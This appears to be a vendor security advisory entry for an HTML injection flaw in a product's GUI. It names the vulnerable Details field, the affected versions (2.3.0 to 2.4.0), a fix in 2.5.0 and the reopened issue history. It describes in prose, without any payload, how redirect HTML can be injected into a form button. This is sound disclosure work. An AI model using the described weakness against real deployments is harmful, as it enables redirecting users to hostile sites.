EIQ-2018-0017#
ID |
EIQ-2018-0017 |
|---|---|
CVE |
- |
Description |
HTML injection through the GUI |
Date |
05 Jun 2019 |
Severity |
2 - MEDIUM |
CVSSv3 score |
CVSSv3 score not available on NIST NVD. |
Status |
✅ 2.5.0 |
Assessment |
Some manual input fields in the GUI parse HTML, instead of rendering it as raw source. For example, this occurs in the Details input field in a workspace dashboard view, when users are in edit mode. The code is sanitized to prevent cross-site scripting (XSS) injection attacks. However, it is still possible to inject HTML containing redirects. As a consequence, a form submission button can be injected with HTML containing redirects to external sites and resources. |
Mitigation |
- |
Affected versions |
2.3.0 to 2.4.0 included. |
Notes |
Former refs: 25750; 36511 This issue was closed as solved in release 2.4.0. However, the problem persisted. We reopened it with a planned solution available in release 2.5.0. Note The date in the Date field refers to the point in time when the issue was reopened. |